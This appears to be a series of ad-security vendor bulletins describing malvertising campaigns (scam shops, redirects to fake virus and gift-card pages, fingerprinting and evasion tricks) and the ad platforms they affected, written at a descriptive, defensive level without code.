Assessment: We have identified a new scam ad campaign posing to be a clothing store luring customers with high discounts and seemingly legitimate product catalogs. Once a purchase has been made, they send low-quality products or nothing at all. They also collect financial information such as credit card numbers and additional bank details which can be used for illegal activities in the future. Their customer service and refund policies also indicate a scam. Because of these issues, we have added this campaign to our blocklist. 

Affected Platforms: Google Ad Exchange

Ad Image:

Landing page:

Assessment: Over the past week, Boltive observed a malicious redirect campaign driving users to a fake landing page or iPhone virus scam. The malicious ads utilized evasion techniques like string reverse and string concat to avoid detection. Under favorable technical conditions, these ads do the redirection, otherwise, they look benign without any suspicious behavior indicators. 

Affected Platform:  Pubmatic

Assessment:  Desktop redirect campaign impacting 1,300 domains.  The malicious code itself relied on user inputs (such as click or scroll) to trigger the redirect.  While this tactic is not new, it is a strategy that has been dormant for much of the year. Users were delivered a fake McAfee virus software popup prompting a download of more malicious code.  The actual malicious ad code attempted to remove important functionality from the ad frame as well as the mainframe.  This means that every time the redirection didn't occur there was also a risk that the page itself could break. 

Interestingly, this campaign showed more sophistication in the code, collecting real-time data for analysis.  Fraudsters added a random sampling of the ads, indicating that they expected large volumes of traffic, and planned to optimize their campaigns based on the learnings.  The campaign, like many others, looked for the presence of blocking wrappers, in this case, ADL and two other competitors.  This is something we expect, and have protection against, a nuance that all publishers/platforms should confirm with their providers.

Affected platforms:  Early intelligence pointed to ReklamStore as the source of the redirects, however, ADL confirmed that Yieldmo was in fact the platform most impacted by this outbreak.

Assessment:  

This malicious campaign has two methods of triggering the redirect. They attempt to load a script by writing a script call to a jquery file from http://ajax.googleapis.com and then run a function to replace all parts of the url to build the malicious payload and sends along fingerprinting information (screen w/h, platform, UA, color depth, number of plugins, timestamp, etc).  It additionally loads a hidden iframe with a source that executes javascript that attempts to do a top.location.replace.  

The ad that is loaded along with this malicious payload is a simple image (either a logo or a stolen Amazon Fire TV Stick ad) that actually takes a user to an Amazon listing for a firetv stick.

There seem to be two different campaigns active at the moment - one leading to healthnotetoday(dot)com and the other leading to various gift card scam pages. 

Affected Platforms:  GumGum (buyer has been blocked) & Between Digital

Assessment: Fraudsters hosting obfuscated scripts on AWS & Yahoo platforms, attempted to deliver malicious redirects to over 300 different domains. To date, over 600M bad ads have been stopped and remonetized, primarily on mobile devices.   

Affected Platforms:  inMobi